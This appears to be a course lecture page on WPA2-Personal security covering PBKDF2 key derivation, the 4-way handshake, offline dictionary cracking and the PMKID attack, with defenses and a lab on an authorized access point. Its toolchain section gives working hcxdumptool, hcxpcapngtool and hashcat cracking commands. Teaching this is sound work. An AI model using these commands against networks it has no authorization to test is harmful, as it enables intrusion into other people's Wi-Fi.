— Wi-Fi Alliance Technical Note on WPA2-Personal">
Classroom Glossary Public page

WIR-101 Week 4 — WPA2-PSK: The 4-Way Handshake and the Dictionary Attack

922 words

"The security of WPA2 Personal rests entirely on the strength of the passphrase." — Wi-Fi Alliance Technical Note on WPA2-Personal

Lecture (50 min)

4.1 WPA2-PSK Architecture

WPA2-Personal (PSK mode) replaced both WEP and WPA-TKIP. It uses:

  • AES-CCMP for data encryption (Counter Mode CBC-MAC Protocol)
  • PBKDF2 to derive the Pairwise Master Key (PMK) from the passphrase
  • 4-way handshake to derive per-session traffic keys (PTK) from the PMK
  • EAPOL (Extensible Authentication Protocol over LAN) as the transport for the handshake

AES-CCMP is a block cipher in CCM mode. CCM combines CTR mode encryption with CBC-MAC authentication, providing both confidentiality and integrity in a single pass. The cipher block size is 128 bits; the key is 128 or 256 bits.

4.2 Key Derivation: From Passphrase to PTK

Step 1 — PMK derivation:

PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096, 256)

PBKDF2 with 4096 iterations stretches the passphrase. The SSID is the salt, which means the PMK is SSID-specific (a precomputed table for "linksys" does not work against "home-network-5G"). The PMK is 256 bits.

Step 2 — ANonce + SNonce exchange (4-way handshake):

AP  --[Message 1]--> STA   ANonce (random, 256 bits)
STA --[Message 2]--> AP    SNonce + MIC (Message Integrity Code)
AP  --[Message 3]--> STA   GTK (Group Temporal Key, encrypted) + MIC
STA --[Message 4]--> AP    ACK

Step 3 — PTK derivation:

PTK = PRF-512(PMK, "Pairwise key expansion", min(AP_MAC,STA_MAC) || max(AP_MAC,STA_MAC) || min(ANonce,SNonce) || max(ANonce,SNonce))

The PTK is derived using a Pseudo-Random Function (PRF-512) that takes the PMK, a string label, both MAC addresses, and both nonces. The result is split into:

  • KCK (Key Confirmation Key, 128 bits): used to compute the MIC in messages 2, 3, 4
  • KEK (Key Encryption Key, 128 bits): used to encrypt the GTK in message 3
  • TK (Temporal Key, 128 bits): the actual AES-CCMP session key for data

4.3 The Attack: Why the Handshake is Capturable

The 4-way handshake is transmitted in cleartext on the wireless medium (EAPOL frames are not encrypted). The MIC in messages 2 and 4 is computed as:

MIC = HMAC-SHA1(KCK, EAPOL_frame)  (truncated to 128 bits)

An attacker who captures:

  • The SSID (from the Beacon)
  • ANonce (from Message 1)
  • SNonce + MIC (from Message 2)
  • AP MAC + STA MAC (from the frame headers)

...can attempt to verify a candidate passphrase offline:

  1. Compute PMK = PBKDF2(passphrase, SSID, 4096, 256)
  2. Derive PTK using the captured nonces and MACs
  3. Compute expected MIC using the KCK
  4. Compare to captured MIC

If they match, the passphrase is correct. This is a pure offline attack. The attacker never needs to interact with the AP again.

4.4 The PMKID Attack (Clientless Variant)

In 2018, Jens Steube (hashcat lead developer) discovered that the PMKID, present in the first EAPOL Message 1, can be used to verify a passphrase without capturing a full 4-way handshake:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || STA_MAC)

The PMKID is appended to the RSN IE of the AP's first EAPOL message. The attacker:

  1. Sends an association request to the AP (no client needs to be connected)
  2. The AP responds with Message 1 containing the PMKID
  3. Extract PMKID; run offline dictionary attack exactly as with the 4-way handshake

Tools: hcxdumptool captures the PMKID; hcxpcapngtool converts to hashcat format (-m 22000).

The PMKID attack is clientless -- no deauthentication required, no waiting for a client to connect.

4.5 Dictionary Attack Mechanics

The offline attack is computationally bounded by PBKDF2's 4096 iterations. On a modern GPU:

Hardware Approx. Throughput
CPU (single core) ~100 hashes/sec
RTX 3090 ~600,000 hashes/sec
8x RTX 4090 cluster ~4,000,000 hashes/sec

rockyou.txt has ~14 million entries. On a single RTX 3090: ~23 seconds to exhausted. Against a passphrase not in rockyou: the attack fails.

Passphrase strength: PBKDF2-SHA1 4096 iterations limits the GPU throughput. A 20-character random passphrase from a 95-character printable ASCII space has 95^20 ≈ 10^39 candidates -- far beyond any brute-force scenario. But most users choose passphrases like "SunflowerFields2024" which appear in combined dictionaries with rule-based mutations.

4.6 Defense Recommendations

  1. Use a strong passphrase: minimum 20 characters; avoid dictionary words; use a password manager
  2. Enable MFP (802.11w): prevents deauthentication-forced handshake capture
  3. Move to WPA3-SAE: eliminates offline dictionary attacks entirely (see Week 6)
  4. Segment the wireless network: even if the PSK is compromised, limit lateral movement with VLAN isolation

Lab Preview

Lab 4 captures a WPA2-PSK 4-way handshake using deauthentication injection, then runs a dictionary attack with hashcat. The authorized lab AP is pre-configured with a passphrase that exists in the provided wordlist.

Homework

Reading (45 min): Read the IEEE 802.11i standard summary at Wi-Fi Alliance (linked from course portal), focusing on the key hierarchy diagram. Then read the Steube 2018 PMKID blog post (linked).

Hands-on (60 min): In Python, implement the PMK derivation:

import hashlib, binascii
pmk = hashlib.pbkdf2_hmac('sha1', b'passphrase', b'SSID', 4096, 32)
print(binascii.hexlify(pmk))

Use the provided test vector (passphrase='password', SSID='IEEE') and verify your output matches the 802.11 test vector in Appendix H.4 of the 802.11i spec.

Toolchain Diary Entry

First-introduce this week: hcxdumptool, hcxpcapngtool, hashcat -m 22000

hcxdumptool -i wlan0mon -o out.pcapng --enable_status=1: capture PMKID and/or 4-way handshakes. --enable_status=1 prints progress.

hcxpcapngtool -o hash.22000 out.pcapng: convert capture to hashcat 22000 format (handles both PMKID and EAPOL handshakes).

hashcat -m 22000 hash.22000 wordlist.txt -r rules/best64.rule: dictionary attack with rule mutations. -m 2500 is deprecated; use -m 22000.

Key Terms

  • PMK: Pairwise Master Key; 256-bit key derived from passphrase + SSID via PBKDF2-SHA1-4096
  • PTK: Pairwise Transient Key; per-session key derived from PMK + nonces + MAC addresses; split into KCK, KEK, TK
  • ANonce / SNonce: Authenticator Nonce / Supplicant Nonce; random 256-bit values from AP and STA respectively; used in PTK derivation
  • EAPOL: Extensible Authentication Protocol over LAN; transport for 4-way handshake messages
  • MIC: Message Integrity Code; HMAC-SHA1 of the EAPOL frame computed with KCK; proves knowledge of PMK without revealing it
  • PMKID: Pairwise Master Key Identifier; HMAC-SHA1-128 of PMK + "PMK Name" + AP_MAC + STA_MAC; present in EAPOL Message 1; enables clientless dictionary attack
  • PBKDF2: Password-Based Key Derivation Function 2; stretches a passphrase using N iterations of HMAC; makes GPU dictionary attacks slower but not impossible